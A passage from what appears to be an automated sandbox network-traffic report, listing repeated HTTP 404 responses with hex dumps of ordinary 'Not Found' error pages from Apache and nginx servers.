6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 30 68 31 30 30 30 76 32 30 33 2e 31 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 77 61 74 65 72 5f 31 5f 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 78 31 3d 22 35 30 30 22 20 79 31 3d 22 33 35 34 22 20 78 32 3d 22 35 30 30 22 20 79 32 3d 22 32 30 30 2e 36 36 37 22 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 30 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 66 66 66 22 2f 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 62 33 64 63 64 66 22 2f 3e 0a 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 77 61 74 65 72 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 77 61 74 65 72 5f 31 5f 29 22 20 64 3d 22 4d 30 20 32 30 30 2e 37 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 6c 61 6e 64 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 33 2e 34 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 67 20 69 64 3d 22 62 75 6d 70 73 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 35 2e 32 73 38 33 2e 38 2d 32 38 20 31 38 30 2d 32 38 20 31 39 37 20 32 38 20 31 39 37 20 32 38 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 33 37 37 20 32 37 35 2e 32 73 35 34 2e 37 2d 32 38 20 31 31 37 2e 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 33 37 37 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 36 32 33 2e 32 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31 37 39 2e 39 2d 32 38 20 31 39 36 2e 39 20 32 38 20 31 39 36 2e 39 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 06:43:49 GMTServer: ApacheContent-Length: 18121Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 30 68 31 30 30 30 76 32 30 33 2e 31 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 77 61 74 65 72 5f 31 5f 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 78 31 3d 22 35 30 30 22 20 79 31 3d 22 33 35 34 22 20 78 32 3d 22 35 30 30 22 20 79 32 3d 22 32 30 30 2e 36 36 37 22 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 30 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 66 66 66 22 2f 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 62 33 64 63 64 66 22 2f 3e 0a 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 77 61 74 65 72 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 77 61 74 65 72 5f 31 5f 29 22 20 64 3d 22 4d 30 20 32 30 30 2e 37 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 6c 61 6e 64 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 33 2e 34 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 67 20 69 64 3d 22 62 75 6d 70 73 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 35 2e 32 73 38 33 2e 38 2d 32 38 20 31 38 30 2d 32 38 20 31 39 37 20 32 38 20 31 39 37 20 32 38 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 33 37 37 20 32 37 35 2e 32 73 35 34 2e 37 2d 32 38 20 31 31 37 2e 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 33 37 37 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 36 32 33 2e 32 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31 37 39 2e 39 2d 32 38 20 31 39 36 2e 39 20 32 38 20 31 39 36 2e 39 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 06:43:51 GMTServer: ApacheContent-Length: 18121Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 30 68 31 30 30 30 76 32 30 33 2e 31 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 77 61 74 65 72 5f 31 5f 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 78 31 3d 22 35 30 30 22 20 79 31 3d 22 33 35 34 22 20 78 32 3d 22 35 30 30 22 20 79 32 3d 22 32 30 30 2e 36 36 37 22 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 30 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 66 66 66 22 2f 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 62 33 64 63 64 66 22 2f 3e 0a 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 77 61 74 65 72 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 77 61 74 65 72 5f 31 5f 29 22 20 64 3d 22 4d 30 20 32 30 30 2e 37 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 6c 61 6e 64 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 33 2e 34 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 67 20 69 64 3d 22 62 75 6d 70 73 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 35 2e 32 73 38 33 2e 38 2d 32 38 20 31 38 30 2d 32 38 20 31 39 37 20 32 38 20 31 39 37 20 32 38 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 33 37 37 20 32 37 35 2e 32 73 35 34 2e 37 2d 32 38 20 31 31 37 2e 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 33 37 37 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 36 32 33 2e 32 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31 37 39 2e 39 2d 32 38 20 31 39 36 2e 39 20 32 38 20 31
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 06:44:38 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 203Connection: closeServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 72 79 77 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /sryw/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 06:44:40 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 203Connection: closeServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 72 79 77 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /sryw/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 06:44:43 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 203Connection: closeServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 72 79 77 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /sryw/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 06:44:45 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 203Connection: closeServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 72 79 77 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /sryw/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 27 Aug 2024 06:44:52 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "663a05b6-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 27 Aug 2024 06:44:54 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "663a05b6-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 27 Aug 2024 06:44:57 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "663a05b6-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 